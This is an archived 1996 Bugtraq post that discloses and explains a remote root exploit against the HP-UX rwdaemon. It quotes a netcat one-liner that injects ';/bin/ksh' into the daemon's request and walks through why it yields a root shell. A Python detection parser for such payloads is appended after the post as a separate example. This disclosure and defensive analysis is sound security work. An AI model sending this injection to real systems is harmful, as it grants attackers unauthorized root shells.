Bugtraq mailing list archives

HP/UX Remote Watch (was Re: BoS: SOD remote exploit)


From: barnett () GRYMOIRE CRD GE COM (Bruce Barnett)
Date: Tue, 15 Oct 1996 09:51:10 -0400


There have been questions about this exploit:

==========
#!/bin/ksh
echo ' 11T ;/bin/ksh' | nc $1 5556
# Yup, that's it.  That's the hole.. Believe it.
==========


This was the first HP "hole of the week", found "courtesy of"

        http://command.com.inter.net/~sod

in late September 1996.

I found the following note along with the exploit:

==========

The Explanation

First, if you're not running with netcat, stop and go out and get it.
You could do this with telnet, and netcat certainly isn't required for
this at all, but it just kicks in general, IMHO.

Now, basically what we're doing is sending a string to the rwdaemon port,
which is usually # 5556.  This could change, but I haven't seen anyone who's
done it yet.  The string has basically three parts, the ' 11' part, the T,
and the ';/bin/ksh' part.  The 11 represents the total string length as sent
to the daemon (minus the first three bytes, of course), sent in ASCII
numeric for some ungodly reason.  The T signals a certain program, in this
case, ummm, getparams, I think.  Now from this point, we can only send a
single argument to the daemon, because it will strip out whitespace-separated
arguments and only use the first one.  The getparams program gets run under a
shell, so all the shell metacharacters are valid.  The shell gets sent the
command 'getparams -somearg1 -somearg2 ;/bin/ksh -v' (the -v gets stuck as
the last argument).  It'll balk on the getparams, send the error, then drop
you into a root shell.. How thoughtful of it.
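As an added example that is not part of this post or of SOD's code: a small Python parser for the rwdaemon request framing the note describes (a 3-byte ASCII decimal length, a one-letter command code, then the first whitespace-separated argument), used from the detection side to flag captured port 5556 payloads whose effective argument carries shell metacharacters. The sample payloads are constructed, and any framing detail beyond what the note states is an assumption.

```python
import re
from typing import Optional

SHELL_META = re.compile(r"[;&|`$<>()\n]")  # metacharacters a getparams arg never needs

def parse_rw_message(data: bytes) -> Optional[dict]:
    """Split a request into the parts the note describes: a 3-byte ASCII
    decimal length, a one-letter command code, then arguments of which the
    daemon uses only the first whitespace-separated token (assumed layout)."""
    if len(data) < 4:
        return None
    try:
        declared = int(data[:3].decode("ascii").strip())
    except ValueError:
        return None
    body = data[3:]
    args = body[1:].split()
    return {
        "declared_len": declared,
        "length_ok": declared == len(body),
        "command": body[:1].decode("ascii", "replace"),
        "first_arg": args[0].decode("ascii", "replace") if args else "",
    }

def is_suspicious(msg: dict) -> bool:
    """True when the effective argument carries shell metacharacters, the
    condition that lets ';/bin/ksh' reach the shell running getparams."""
    return SHELL_META.search(msg["first_arg"]) is not None

def scan_payloads(payloads):
    """Return (index, parsed message) for each payload that should alert."""
    alerts = []
    for i, raw in enumerate(payloads):
        msg = parse_rw_message(raw)
        if msg is not None and is_suspicious(msg):
            alerts.append((i, msg))
    return alerts

# Constructed samples: the exploit string from the post, a hypothetical
# well-formed request, and a payload too short to carry the framing.
SAMPLES = [b" 11T ;/bin/ksh", b"  4T -v", b"xyz"]

if __name__ == "__main__":
    for idx, msg in scan_payloads(SAMPLES):
        print(f"payload {idx}: command={msg['command']!r} arg={msg['first_arg']!r}")
```

A rule of this shape only catches the framing the note describes; a safer fix on the host is to stop rwdaemon from handing arguments to a shell at all.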


